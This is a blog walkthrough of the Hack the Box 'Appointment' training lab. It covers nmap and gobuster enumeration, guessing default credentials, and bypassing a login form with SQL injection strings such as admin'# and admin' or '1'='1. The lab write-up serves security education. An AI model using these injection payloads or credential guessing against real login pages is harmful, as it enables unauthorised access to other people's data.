Hack the Box — Appointment

HTB Tags: #Linux #SQL #SQLi #MariaDB

This is the first in Tier 1, as part of the Starting Point series, with a focus database injection on a Linux target. Let’s start by enumerating with the standard commands, ping and nmap.

ping

ping $IP -c 4

nmap

nmap $IP

Only one showing and it is the default http port webpage.

website

Looks like we have a login page showing:

Trying the usual user and passwords does not provide access.
* admin:admin
* guest:guest
* user:user
* root:root
* administrator:password

Although we know the challenge is sqli based, lets just complete the enumeration with a gobuster review.

gobuster

Quickly looking through the directories does not provide anything that can assist.

sqli

What is sql injection (sqli). From Portswigger the provider of the Burp Suite set of tools, they describe it as:

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior. In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

An excellent example of how the sql code can be used within the database and utilised in the login page is written by Niveet Palan under his Handbook for SQL Injection.

I will let you review his document, but will only discuss how we can the process for the admin user.

We will type in the admin username and close the query with a single quote, allowing the script to search for the admin username. By adding the hashtag, we will then comment out the rest of the query, which will make searching for a matching password for the specified username obsolete. So as long as there is a user called `admin` then we will gain access. Most times I repeat the user details with teh password. In this case you can actually enter anything.

We could also use `admin’ or ‘1’=’1` which in a similar manner forces the request to accept the user as TRUE, therefore existing…..

We now gain access and the challenge flag.

A further resource and listing of these exploitable commands can be found at:

summary

An interesting way to gain access to a target. Also worthwhile following and understanding the Injection Handbook, mentioned above as it gives you a better understanding for creating database queries, which you will definitely use later.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
James Pearson

James Pearson

20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.